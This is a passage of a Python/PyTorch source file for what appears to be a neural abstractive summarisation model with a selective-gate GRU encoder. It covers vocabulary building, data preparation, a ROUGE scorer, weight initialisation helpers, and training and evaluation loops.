self.special = []\n\n if data is not None:\n if type(data) == str:\n self.loadFile(data)\n else:\n self.addSpecials(data)\n\n def size(self):\n return len(self.idxToLabel)\n\n # Load entries from a file.\n def loadFile(self, filename):\n for line in open(filename, encoding='utf-8'):\n fields = line.split(' ')\n label = fields[0]\n idx = int(fields[1])\n self.add(label, idx)\n\n # Write entries to a file. r, w, a\n def writeFile(self, filename):\n with open(filename, 'w', encoding='utf-8') as file:\n for i in range(self.size()):\n label = self.idxToLabel[i]\n file.write('%s %d\\n' % (label, i))\n\n file.close()\n\n def lookup(self, key, default=None):\n key = key.lower() if self.lower else key\n try:\n return self.labelToIdx[key]\n except KeyError:\n return default\n\n def getLabel(self, idx, default=None):\n try:\n return self.idxToLabel[idx]\n except KeyError:\n return default\n\n # Mark this `label` and `idx` as special (i.e. will not be pruned).\n def addSpecial(self, label, idx=None):\n idx = self.add(label, idx)\n self.special += [idx]\n\n # Mark all labels in `labels` as specials (i.e. will not be pruned).\n def addSpecials(self, labels):\n for label in labels:\n self.addSpecial(label)\n\n # Add `label` in the dictionary. Use `idx` as its index if given.\n def add(self, label, idx=None):\n label = label.lower() if self.lower else label\n if idx is not None:\n self.idxToLabel[idx] = label\n self.labelToIdx[label] = idx\n else:\n if label in self.labelToIdx:\n idx = self.labelToIdx[label]\n else:\n idx = len(self.idxToLabel)\n self.idxToLabel[idx] = label\n self.labelToIdx[label] = idx\n\n if idx not in self.frequencies:\n self.frequencies[idx] = 1\n else:\n self.frequencies[idx] += 1\n\n return idx\n\n # Return a new dictionary with the `size` most frequent entries.\n def prune(self, size):\n if size >= self.size():\n return self\n\n # Only keep the `size` most frequent entries.\n freq = torch.Tensor([self.frequencies[i] for i in range(len(self.frequencies))])\n _, idx = torch.sort(freq, 0, True)\n\n newDict = Dict()\n newDict.lower = self.lower\n\n # Add special entries in all cases.\n for i in self.special:\n newDict.addSpecial(self.idxToLabel[i])\n\n for i in idx[:size]:\n newDict.add(self.idxToLabel[i])\n\n return newDict\n\n # Convert `labels` to indices. Use `unkWord` if not found.\n # Optionally insert `bosWord` at the beginning and `eosWord` at the .\n def convertToIdx(self, labels, unkWord, bosWord=None, eosWord=None):\n vec = []\n\n if bosWord is not None:\n vec += [self.lookup(bosWord)]\n\n unk = self.lookup(unkWord)\n vec += [self.lookup(label, default=unk) for label in labels]\n\n if eosWord is not None:\n vec += [self.lookup(eosWord)]\n\n return torch.LongTensor(vec)\n\n # Convert `idx` to labels. If index `stop` is reached, convert it and return.\n def convertToLabels(self, idx, stop):\n labels = []\n\n for i in idx:\n labels += [self.getLabel(i)]\n if i == stop:\n break\n\n return labels\n\n\ndef makeVocabulary(filenames, size):\n vocab = Dict([PAD_WORD, UNK_WORD, BOS_WORD, EOS_WORD], lower=lower)\n for filename in filenames:\n with open(filename, encoding='utf-8') as f:\n for sent in f.readlines():\n for word in sent.strip().split(' '):\n vocab.add(word)\n\n originalSize = vocab.size()\n vocab = vocab.prune(size)\n logger.info('Created dictionary of size %d (pruned from %d)' % (vocab.size(), originalSize))\n\n return vocab\n\n\ndef initVocabulary(name, dataFiles, vocabFile, vocabSize):\n vocab = None\n if vocabFile is not None:\n # If given, load existing word dictionary.\n logger.info('Reading ' + name + ' vocabulary from \\'' + vocabFile + '\\'...')\n vocab = Dict()\n vocab.loadFile(vocabFile)\n logger.info('Loaded ' + str(vocab.size()) + ' ' + name + ' words')\n\n if vocab is None:\n # If a dictionary is still missing, generate it.\n logger.info('Building ' + name + ' vocabulary...')\n genWordVocab = makeVocabulary(dataFiles, vocabSize)\n vocab = genWordVocab\n return vocab\n\n\ndef saveVocabulary(name, vocab, file):\n logger.info('Saving ' + name + ' vocabulary to \\'' + file + '\\'...')\n vocab.writeFile(file)\n\n\ndef makeData(srcFile, tgtFile, srcDicts, tgtDicts):\n src, tgt = [], []\n sizes = []\n count, ignored = 0, 0\n\n logger.info('Processing %s & %s ...' % (srcFile, tgtFile))\n srcF = open(srcFile, encoding='utf-8')\n tgtF = open(tgtFile, encoding='utf-8')\n\n while True:\n sline = srcF.readline()\n tline = tgtF.readline()\n\n # normal end of file\n if sline == \"\" and tline == \"\":\n break\n\n # source or target does not have same number of lines\n if sline == \"\" or tline == \"\":\n logger.info('WARNING: source and target do not have the same number of sentences')\n break\n\n sline = sline.strip()\n tline = tline.strip()\n\n # source and/or target are empty\n if sline == \"\" or tline == \"\":\n logger.info('WARNING: ignoring an empty line (' + str(count + 1) + ')')\n continue\n\n srcWords = sline.split(' ')\n tgtWords = tline.split(' ')\n\n if len(srcWords) <= seq_length and len(tgtWords) <= seq_length:\n src += [srcDicts.convertToIdx(srcWords,\n UNK_WORD)]\n tgt += [tgtDicts.convertToIdx(tgtWords,\n UNK_WORD,\n BOS_WORD,\n EOS_WORD)]\n\n sizes += [len(srcWords)]\n else:\n ignored += 1\n\n count += 1\n\n if count % report_every == 0:\n logger.info('... %d sentences prepared' % count)\n\n srcF.close()\n tgtF.close()\n\n if shuffle == 1:\n logger.info('... shuffling sentences')\n perm = torch.randperm(len(src))\n # torch.randperm 给定参数n,返回一个从0 到n -1 的随机整数排列。 参数: n (int) – 上边界(不包含)\n src = [src[idx] for idx in perm]\n tgt = [tgt[idx] for idx in perm]\n sizes = [sizes[idx] for idx in perm]\n\n logger.info('... sorting sentences by size')\n _, perm = torch.sort(torch.Tensor(sizes))\n src = [src[idx] for idx in perm]\n tgt = [tgt[idx] for idx in perm]\n\n logger.info('Prepared %d sentences (%d ignored due to length == 0 or > %d)' %\n (len(src), ignored, seq_length))\n return src, tgt\n\n\ndef prepare_data_online(train_src, src_vocab, train_tgt, tgt_vocab):\n dicts = {}\n dicts['src'] = initVocabulary('source', [train_src], src_vocab, 0)\n dicts['tgt'] = initVocabulary('target', [train_tgt], tgt_vocab, 0)\n\n logger.info('Preparing training ...')\n train = {}\n train['src'], train['tgt'] = makeData(train_src,\n train_tgt,\n dicts['src'],\n dicts['tgt'])\n\n dataset = {'dicts': dicts,\n 'train': train,\n # 'valid': valid\n }\n return dataset\n\n\n# logger.info('My seed is {0}'.format(torch.initial_seed()))\n# logger.info('My cuda seed is {0}'.format(torch.cuda.initial_seed()))\n\n\nclass Rouge(object):\n def __init__(self, stem=True, use_ngram_buf=False):\n self.N = 2\n self.stem = stem\n self.use_ngram_buf = use_ngram_buf\n self.ngram_buf = {}\n\n @staticmethod\n def _format_sentence(sentence):\n s = sentence.lower()\n s = re.sub(r\"[^0-9a-z]\", \" \", s)\n s = re.sub(r\"\\s+\", \" \", s)\n s = s.strip()\n return s\n\n def _create_n_gram(self, raw_sentence, n, stem):\n if self.use_ngram_buf:\n if raw_sentence in self.ngram_buf:\n return self.ngram_buf[raw_sentence]\n res = {}\n sentence = Rouge._format_sentence(raw_sentence)\n tokens = sentence.split(' ')\n if stem:\n # try: # TODO older NLTK has a bug in Porter Stemmer\n tokens = [stemmer.stem(t) for t in tokens]\n # except:\n # pass\n sent_len = len(tokens)\n for _n in range(n):\n buf = Counter()\n for idx, token in enumerate(tokens):\n if idx + _n >= sent_len:\n break\n ngram = ' '.join(tokens[idx: idx + _n + 1])\n buf[ngram] += 1\n res[_n] = buf\n if self.use_ngram_buf:\n self.ngram_buf[raw_sentence] = res\n return res\n\n def get_ngram(self, sents, N, stem=False):\n if isinstance(sents, list):\n res = {}\n for _n in range(N):\n res[_n] = Counter()\n for sent in sents:\n ngrams = self._create_n_gram(sent, N, stem)\n for this_n, counter in ngrams.items():\n # res[this_n] = res[this_n] + counter\n self_counter = res[this_n]\n for elem, count in counter.items():\n if elem not in self_counter:\n self_counter[elem] = count\n else:\n self_counter[elem] += count\n return res\n elif isinstance(sents, str):\n return self._create_n_gram(sents, N, stem)\n else:\n raise ValueError\n\n def get_mean_sd_internal(self, x):\n mean = np.mean(x)\n sd = st.sem(x)\n res = st.t.interval(0.95, len(x) - 1, loc=mean, scale=sd)\n return (mean, sd, res)\n\n def compute_rouge(self, references, systems):\n assert (len(references) == len(systems))\n\n peer_count = len(references)\n\n result_buf = {}\n for n in range(self.N):\n result_buf[n] = {'p': [], 'r': [], 'f': []}\n\n for ref_sent, sys_sent in zip(references, systems):\n ref_ngrams = self.get_ngram(ref_sent, self.N, self.stem)\n sys_ngrams = self.get_ngram(sys_sent, self.N, self.stem)\n for n in range(self.N):\n ref_ngram = ref_ngrams[n]\n sys_ngram = sys_ngrams[n]\n ref_count = sum(ref_ngram.values())\n sys_count = sum(sys_ngram.values())\n match_count = 0\n for k, v in sys_ngram.items():\n if k in ref_ngram:\n match_count += min(v, ref_ngram[k])\n p = match_count / sys_count if sys_count != 0 else 0\n r = match_count / ref_count if ref_count != 0 else 0\n f = 0 if (p == 0 or r == 0) else 2 * p * r / (p + r)\n result_buf[n]['p'].append(p)\n result_buf[n]['r'].append(r)\n result_buf[n]['f'].append(f)\n\n res = {}\n for n in range(self.N):\n n_key = 'rouge-{0}'.format(n + 1)\n res[n_key] = {}\n if len(result_buf[n]['p']) >= 50:\n res[n_key]['p'] = self.get_mean_sd_internal(result_buf[n]['p'])\n res[n_key]['r'] = self.get_mean_sd_internal(result_buf[n]['r'])\n res[n_key]['f'] = self.get_mean_sd_internal(result_buf[n]['f'])\n else:\n # not enough samples to calculate confidence interval\n res[n_key]['p'] = (np.mean(np.array(result_buf[n]['p'])), 0, (0, 0))\n res[n_key]['r'] = (np.mean(np.array(result_buf[n]['r'])), 0, (0, 0))\n res[n_key]['f'] = (np.mean(np.array(result_buf[n]['f'])), 0, (0, 0))\n\n return res\n\n\ndef calculate_gain(nonlinearity, param=None):\n \"\"\"Return the recommended gain value for the given nonlinearity function. The values are as follows:\n\n ============ ==========================================\n nonlinearity gain\n ============ ==========================================\n linear :math:`1`\n conv{1,2,3}d :math:`1`\n sigmoid :math:`1`\n tanh :math:`5 / 3`\n relu :math:`\\sqrt{2}`\n leaky_relu :math:`\\sqrt{2 / (1 + negative\\_slope^2)}`\n ============ ==========================================\n\n Args:\n nonlinearity: the nonlinear function (`nn.functional` name)\n param: optional parameter for the nonlinear function\n\n Examples:\n >>> gain = nn.init.gain('leaky_relu')\n \"\"\"\n linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']\n if nonlinearity in linear_fns or nonlinearity == 'sigmoid':\n return 1\n elif nonlinearity == 'tanh':\n return 5.0 / 3\n elif nonlinearity == 'relu':\n return math.sqrt(2.0)\n elif nonlinearity == 'leaky_relu':\n if param is None:\n negative_slope = 0.01\n elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float):\n # True/False are instances of int, hence check above\n negative_slope = param\n else:\n raise ValueError(\"negative_slope {} not a valid number\".format(param))\n return math.sqrt(2.0 / (1 + negative_slope ** 2))\n else:\n raise ValueError(\"Unsupported nonlinearity {}\".format(nonlinearity))\n\n\ndef uniform(tensor, a=0, b=1):\n \"\"\"Fills the input Tensor or Variable with values drawn from the uniform distribution :math:`U(a, b)`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the lower bound of the uniform distribution\n b: the upper bound of the uniform distribution\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.uniform(w)\n \"\"\"\n if isinstance(tensor, Variable):\n uniform(tensor.data, a=a, b=b)\n return tensor\n\n return tensor.uniform_(a, b)\n\n\ndef normal(tensor, mean=0, std=1):\n \"\"\"Fills the input Tensor or Variable with values drawn from the normal distribution :math:`N(mean, std)`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n mean: the mean of the normal distribution\n std: the standard deviation of the normal distribution\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.normal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n normal(tensor.data, mean=mean, std=std)\n return tensor\n\n return tensor.normal_(mean, std)\n\n\ndef constant(tensor, val):\n \"\"\"Fills the input Tensor or Variable with the value `val`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n val: the value to fill the tensor with\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.constant(w)\n \"\"\"\n if isinstance(tensor, Variable):\n constant(tensor.data, val)\n return tensor\n\n return tensor.fill_(val)\n\n\ndef eye(tensor):\n \"\"\"Fills the 2-dimensional input Tensor or Variable with the identity matrix. Preserves the identity of the inputs\n in Linear layers, where as many inputs are preserved as possible.\n\n Args:\n tensor: a 2-dimensional torch.Tensor or autograd.Variable\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.eye(w)\n \"\"\"\n if tensor.ndimension() != 2:\n raise ValueError(\"Only tensors with 2 dimensions are supported\")\n\n if isinstance(tensor, Variable):\n eye(tensor.data)\n return tensor\n\n return tensor.copy_(torch.eye(tensor.size(0), tensor.size(1)))\n\n\ndef dirac(tensor):\n \"\"\"Fills the {3, 4, 5}-dimensional input Tensor or Variable with the Dirac delta function. Preserves the identity of\n the inputs in Convolutional layers, where as many input channels are preserved as possible.\n\n Args:\n tensor: a {3, 4, 5}-dimensional torch.Tensor or autograd.Variable\n\n Examples:\n >>> w = torch.Tensor(3, 16, 5, 5)\n >>> nn.init.dirac(w)\n \"\"\"\n dimensions = tensor.ndimension()\n if dimensions not in [3, 4, 5]:\n raise ValueError(\"Only tensors with 3, 4, or 5 dimensions are supported\")\n\n if isinstance(tensor, Variable):\n dirac(tensor.data)\n return tensor\n\n sizes = tensor.size()\n min_dim = min(sizes[0], sizes[1])\n tensor.zero_()\n\n for d in range(min_dim):\n if dimensions == 3: # Temporal convolution\n tensor[d, d, tensor.size(2) // 2] = 1\n elif dimensions == 4: # Spatial convolution\n tensor[d, d, tensor.size(2) // 2, tensor.size(3) // 2] = 1\n else: # Volumetric convolution\n tensor[d, d, tensor.size(2) // 2, tensor.size(3) // 2, tensor.size(4) // 2] = 1\n return tensor\n\n\ndef _calculate_fan_in_and_fan_out(tensor):\n dimensions = tensor.ndimension()\n if dimensions < 2:\n raise ValueError(\"Fan in and fan out can not be computed for tensor with less than 2 dimensions\")\n\n if dimensions == 2: # Linear\n fan_in = tensor.size(1)\n fan_out = tensor.size(0)\n else:\n num_input_fmaps = tensor.size(1)\n num_output_fmaps = tensor.size(0)\n receptive_field_size = 1\n if tensor.dim() > 2:\n receptive_field_size = tensor[0][0].numel()\n fan_in = num_input_fmaps * receptive_field_size\n fan_out = num_output_fmaps * receptive_field_size\n\n return fan_in, fan_out\n\n\ndef xavier_uniform(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Understanding the\n difficulty of training deep feedforward neural networks\" - Glorot, X. & Bengio, Y. (2010), using a uniform\n distribution. The resulting tensor will have values sampled from :math:`U(-a, a)` where\n :math:`a = gain \\\\times \\sqrt{2 / (fan\\_in + fan\\_out)} \\\\times \\sqrt{3}`. Also known as Glorot initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n gain: an optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.xavier_uniform(w, gain=nn.init.calculate_gain('relu'))\n \"\"\"\n if isinstance(tensor, Variable):\n xavier_uniform(tensor.data, gain=gain)\n return tensor\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n std = gain * math.sqrt(2.0 / (fan_in + fan_out))\n a = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation\n return tensor.uniform_(-a, a)\n\n\ndef xavier_normal(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Understanding the\n difficulty of training deep feedforward neural networks\" - Glorot, X. & Bengio, Y. (2010), using a normal\n distribution. The resulting tensor will have values sampled from :math:`N(0, std)` where\n :math:`std = gain \\\\times \\sqrt{2 / (fan\\_in + fan\\_out)}`. Also known as Glorot initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n gain: an optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.xavier_normal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n xavier_normal(tensor.data, gain=gain)\n return tensor\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n std = gain * math.sqrt(2.0 / (fan_in + fan_out))\n return tensor.normal_(0, std)\n\n\ndef _calculate_correct_fan(tensor, mode):\n mode = mode.lower()\n valid_modes = ['fan_in', 'fan_out']\n if mode not in valid_modes:\n raise ValueError(\"Mode {} not supported, please use one of {}\".format(mode, valid_modes))\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n return fan_in if mode == 'fan_in' else fan_out\n\n\ndef kaiming_uniform(tensor, a=0, mode='fan_in'):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Delving deep into\n rectifiers: Surpassing human-level performance on ImageNet classification\" - He, K. et al. (2015), using a uniform\n distribution. The resulting tensor will have values sampled from :math:`U(-bound, bound)` where\n :math:`bound = \\sqrt{2 / ((1 + a^2) \\\\times fan\\_in)} \\\\times \\sqrt{3}`. Also known as He initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the negative slope of the rectifier used after this layer (0 for ReLU by default)\n mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in` preserves the magnitude of the variance of the\n weights in the forward pass. Choosing `fan_out` preserves the magnitudes in the backwards pass.\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.kaiming_uniform(w, mode='fan_in')\n \"\"\"\n if isinstance(tensor, Variable):\n kaiming_uniform(tensor.data, a=a, mode=mode)\n return tensor\n\n fan = _calculate_correct_fan(tensor, mode)\n gain = calculate_gain('leaky_relu', a)\n std = gain / math.sqrt(fan)\n bound = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation\n return tensor.uniform_(-bound, bound)\n\n\ndef kaiming_normal(tensor, a=0, mode='fan_in'):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Delving deep into\n rectifiers: Surpassing human-level performance on ImageNet classification\" - He, K. et al. (2015), using a normal\n distribution. The resulting tensor will have values sampled from :math:`N(0, std)` where\n :math:`std = \\sqrt{2 / ((1 + a^2) \\\\times fan\\_in)}`. Also known as He initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the negative slope of the rectifier used after this layer (0 for ReLU by default)\n mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in` preserves the magnitude of the variance of the\n weights in the forward pass. Choosing `fan_out` preserves the magnitudes in the backwards pass.\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.kaiming_normal(w, mode='fan_out')\n \"\"\"\n if isinstance(tensor, Variable):\n kaiming_normal(tensor.data, a=a, mode=mode)\n return tensor\n\n fan = _calculate_correct_fan(tensor, mode)\n gain = calculate_gain('leaky_relu', a)\n std = gain / math.sqrt(fan)\n return tensor.normal_(0, std)\n\n\ndef orthogonal(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with a (semi) orthogonal matrix, as described in \"Exact solutions to the\n nonlinear dynamics of learning in deep linear neural networks\" - Saxe, A. et al. (2013). The input tensor must have\n at least 2 dimensions, and for tensors with more than 2 dimensions the trailing dimensions are flattened.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable, where n >= 2\n gain: optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.orthogonal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n orthogonal(tensor.data, gain=gain)\n return tensor\n\n if tensor.ndimension() < 2:\n raise ValueError(\"Only tensors with 2 or more dimensions are supported\")\n\n rows = tensor.size(0)\n cols = tensor[0].numel()\n flattened = torch.Tensor(rows, cols).normal_(0, 1)\n # Compute the qr factorization\n q, r = torch.qr(flattened)\n # Make Q uniform according to https://arxiv.org/pdf/math-ph/0609050.pdf\n d = torch.diag(r, 0)\n ph = d.sign()\n q *= ph.expand_as(q)\n # Pad zeros to Q (if rows smaller than cols)\n if rows < cols:\n padding = torch.zeros(rows, cols - rows)\n if q.is_cuda:\n q = torch.cat([q, padding.cuda()], 1)\n else:\n q = torch.cat([q, padding], 1)\n\n tensor.view_as(q).copy_(q)\n tensor.mul_(gain)\n return tensor\n\n\ndef sparse(tensor, sparsity, std=0.01):\n \"\"\"Fills the 2D input Tensor or Variable as a sparse matrix, where the non-zero elements will be drawn from\n the normal distribution :math:`N(0, 0.01)`, as described in \"Deep learning via\n Hessian-free optimization\" - Martens, J. (2010).\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n sparsity: The fraction of elements in each column to be set to zero\n std: the standard deviation of the normal distribution used to generate the non-zero values\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.sparse(w, sparsity=0.1)\n \"\"\"\n if isinstance(tensor, Variable):\n sparse(tensor.data, sparsity, std=std)\n return tensor\n\n if tensor.ndimension() != 2:\n raise ValueError(\"Only tensors with 2 dimensions are supported\")\n\n tensor.normal_(0, std)\n rows, cols = tensor.size(0), tensor.size(1)\n num_zeros = int(math.ceil(cols * sparsity))\n\n for col_idx in range(tensor.size(1)):\n row_indices = list(range(rows))\n random.shuffle(row_indices)\n zero_indices = row_indices[:num_zeros]\n for row_idx in zero_indices:\n tensor[row_idx, col_idx] = 0\n\n return tensor\n\n\ndef NMTCriterion(vocabSize):\n weight = torch.ones(vocabSize)\n weight[PAD] = 0\n crit = nn.NLLLoss(weight, size_average=False)\n if opt.gpus:\n crit.cuda()\n return crit\n\n\ndef loss_function(g_outputs, g_targets, generator, crit, eval=False):\n g_out_t = g_outputs.view(-1, g_outputs.size(2))\n g_prob_t = generator(g_out_t)\n\n g_loss = crit(g_prob_t, g_targets.view(-1))\n total_loss = g_loss\n report_loss = total_loss.data[0]\n return total_loss, report_loss, 0\n\n\ndef addPair(f1, f2):\n for x, y1 in zip(f1, f2):\n yield (x, y1)\n yield (None, None)\n\n\ndef load_dev_data(translator, src_file, tgt_file):\n dataset, raw = [], []\n srcF = open(src_file, encoding='utf-8')\n tgtF = open(tgt_file, encoding='utf-8')\n src_batch, tgt_batch = [], []\n for line, tgt in addPair(srcF, tgtF):\n if (line is not None) and (tgt is not None):\n src_tokens = line.strip().split(' ')\n src_batch += [src_tokens]\n tgt_tokens = tgt.strip().split(' ')\n tgt_batch += [tgt_tokens]\n\n if len(src_batch) < opt.batch_size:\n continue\n else:\n # at the end of file, check last batch\n if len(src_batch) == 0:\n break\n data = translator.buildData(src_batch, tgt_batch)\n dataset.append(data)\n raw.append((src_batch, tgt_batch))\n src_batch, tgt_batch = [], []\n srcF.close()\n tgtF.close()\n return (dataset, raw)\n\n\nevalModelCount = 0\ntotalBatchCount = 0\nrouge_calculator = Rouge()\n\n\ndef evalModel(model, translator, evalData):\n global evalModelCount\n global rouge_calculator\n evalModelCount += 1\n ofn = 'dev.out.{0}'.format(evalModelCount)\n if opt.save_path:\n ofn = os.path.join(opt.save_path, ofn)\n predict, gold = [], []\n processed_data, raw_data = evalData\n for batch, raw_batch in zip(processed_data, raw_data):\n # (wrap(srcBatch), lengths), (wrap(tgtBatch), ), indices\n src, tgt, indices = batch[0]\n src_batch, tgt_batch = raw_batch\n\n # (2) translate\n pred, predScore, attn, _ = translator.translateBatch(src, tgt)\n pred, predScore, attn = list(zip(\n *sorted(zip(pred, predScore, attn, indices),\n key=lambda x: x[-1])))[:-1]\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(src[0].size(1)):\n n = 0\n predBatch.append(\n translator.buildTargetTokens(pred[b][n], src_batch[b], attn[b][n])\n )\n gold += [' '.join(r) for r in tgt_batch]\n predict += [' '.join(sents) for sents in predBatch]\n scores = rouge_calculator.compute_rouge(gold, predict)\n with open(ofn, 'w', encoding='utf-8') as of:\n for p in predict:\n of.write(p + '\\n')\n return scores['rouge-2']['f'][0]\n\n\ndef trainModel(model, translator, trainData, validData, dataset, optim):\n logger.info(model)\n model.train()\n logger.warning(\"Set model to {0} mode\".format('train' if model.decoder.dropout.training else 'eval'))\n\n # define criterion of each GPU\n criterion = NMTCriterion(dataset['dicts']['tgt'].size())\n\n start_time = time.time()\n\n def saveModel(metric=None):\n model_state_dict = model.module.state_dict() if len(opt.gpus) > 1 else model.state_dict()\n model_state_dict = {k: v for k, v in model_state_dict.items() if 'generator' not in k}\n generator_state_dict = model.generator.module.state_dict() if len(\n opt.gpus) > 1 else model.generator.state_dict()\n # (4) drop a checkpoint\n checkpoint = {\n 'model': model_state_dict,\n 'generator': generator_state_dict,\n 'dicts': dataset['dicts'],\n 'opt': opt,\n 'epoch': epoch,\n 'optim': optim\n }\n save_model_path = 'model'\n if opt.save_path:\n if not os.path.exists(opt.save_path):\n os.makedirs(opt.save_path)\n save_model_path = opt.save_path + os.path.sep + save_model_path\n if metric is not None:\n torch.save(checkpoint, '{0}_devRouge_{1}_e{2}.pt'.format(save_model_path, round(metric, 4), epoch))\n else:\n torch.save(checkpoint, '{0}_e{1}.pt'.format(save_model_path, epoch))\n\n def trainEpoch(epoch):\n\n if opt.extra_shuffle and epoch > opt.curriculum:\n logger.info('Shuffling...')\n trainData.shuffle()\n\n # shuffle mini batch order\n batchOrder = torch.randperm(len(trainData))\n\n total_loss, total_words, total_num_correct = 0, 0, 0\n report_loss, report_tgt_words, report_src_words, report_num_correct = 0, 0, 0, 0\n start = time.time()\n for i in range(len(trainData)):\n global totalBatchCount\n totalBatchCount += 1\n # (wrap(srcBatch), lengths), (wrap(tgtBatch)), indices\n batchIdx = batchOrder[i] if epoch > opt.curriculum else i\n batch = trainData[batchIdx][:-1] # exclude original indices\n\n model.zero_grad()\n g_outputs = model(batch)\n targets = batch[1][0][1:] # exclude from targets\n loss, res_loss, num_correct = loss_function(g_outputs, targets, model.generator, criterion)\n\n # update the parameters\n loss.backward()\n optim.step()\n\n num_words = targets.data.ne(PAD).sum()\n report_loss += res_loss\n report_num_correct += num_correct\n report_tgt_words += num_words\n report_src_words += batch[0][-1].data.sum()\n total_loss += res_loss\n total_num_correct += num_correct\n total_words += num_words\n if i % opt.log_interval == -1 % opt.log_interval:\n logger.info(\n \"Epoch %2d, %6d/%5d/%5d; acc: %6.2f; loss: %6.2f; words: %5d; ppl: %6.2f; %3.0f src tok/s; %3.0f tgt tok/s; %6.0f s elapsed\" %\n (epoch, totalBatchCount, i + 1, len(trainData),\n report_num_correct / report_tgt_words * 100,\n report_loss,\n report_tgt_words,\n math.exp(report_loss / report_tgt_words),\n report_src_words / (time.time() - start),\n report_tgt_words / (time.time() - start),\n time.time() - start))\n\n report_loss = report_tgt_words = report_src_words = report_num_correct = 0\n start = time.time()\n\n if validData is not None and totalBatchCount % opt.eval_per_batch == -1 % opt.eval_per_batch \\\n and totalBatchCount >= opt.start_eval_batch:\n model.eval()\n logger.warning(\"Set model to {0} mode\".format('train' if model.decoder.dropout.training else 'eval'))\n valid_bleu = evalModel(model, translator, validData)\n model.train()\n logger.warning(\"Set model to {0} mode\".format('train' if model.decoder.dropout.training else 'eval'))\n model.decoder.attn.mask = None\n logger.info('Validation Score: %g' % (valid_bleu * 100))\n if valid_bleu >= optim.best_metric:\n saveModel(valid_bleu)\n optim.updateLearningRate(valid_bleu, epoch)\n\n return total_loss / total_words, total_num_correct / total_words\n\n for epoch in range(opt.start_epoch, opt.epochs + 1):\n logger.info('')\n global eeee\n eeee = epoch\n # (1) train for one epoch on the training set\n train_loss, train_acc = trainEpoch(epoch)\n train_ppl = math.exp(min(train_loss, 100))\n logger.info('Train perplexity: %g' % train_ppl)\n logger.info('Train accuracy: %g' % (train_acc * 100))\n logger.info('Saving checkpoint for epoch {0}...'.format(epoch))\n saveModel()\n\n\nclass Encoder(nn.Module):\n def __init__(self, opt, dicts):\n self.layers = opt.layers\n self.num_directions = 2\n assert opt.enc_rnn_size % self.num_directions == 0\n self.hidden_size = opt.enc_rnn_size // self.num_directions\n input_size = opt.word_vec_size\n\n super(Encoder, self).__init__()\n self.word_lut = nn.Embedding(dicts.size(),\n opt.word_vec_size,\n padding_idx=PAD)\n self.rnn = nn.GRU(input_size, self.hidden_size,\n num_layers=opt.layers,\n dropout=opt.dropout,\n bidirectional=True)\n self.selective_gate = nn.Linear(self.hidden_size * 2 * 2, self.hidden_size * 2)\n self.sigmoid = nn.Sigmoid()\n\n def load_pretrained_vectors(self, opt):\n if opt.pre_word_vecs_enc is not None:\n pretrained = torch.load(opt.pre_word_vecs_enc)\n self.word_lut.weight.data.copy_(pretrained)\n\n def forward(self, input, hidden=None):\n \"\"\"\n input: (wrap(srcBatch), wrap(srcBioBatch), lengths)\n \"\"\"\n lengths = input[-1].data.view(-1).tolist() # lengths data is wrapped inside a Variable\n wordEmb = self.word_lut(input[0])\n emb = pack(wordEmb, lengths)\n outputs, hidden_t = self.rnn(emb, hidden)\n if isinstance(input, tuple):\n outputs = unpack(outputs)[0]\n forward_last = hidden_t[0]\n backward_last = hidden_t[1]\n time_step = outputs.size(0)\n batch_size = outputs.size(1)\n sentence_vector = torch.cat((forward_last, backward_last), dim=1)\n exp_buf = torch.cat((outputs, sentence_vector.unsqueeze(0).expand_as(outputs)), dim=2)\n selective_value = self.sigmoid(self.selective_gate(exp_buf.view(-1, exp_buf.size(2))))\n selective_value = selective_value.view(time_step, batch_size, -1)\n outputs = outputs * selective_value\n return hidden_t, outputs\n\n\nclass StackedGRU(nn.Module):\n def __init__(self, num_layers, input_size, rnn_size, dropout):\n super(StackedGRU, self).__init__()\n self.dropout = nn.Dropout(dropout)\n self.num_layers = num_layers\n self.layers = nn.ModuleList()\n\n for i in range(num_layers):\n self.layers.append(nn.GRUCell(input_size, rnn_size))\n input_size = rnn_size\n\n def forward(self, input, hidden):\n h_0 = hidden\n h_1 = []\n for i, layer in enumerate(self.layers):\n h_1_i = layer(input, h_0[i])\n input = 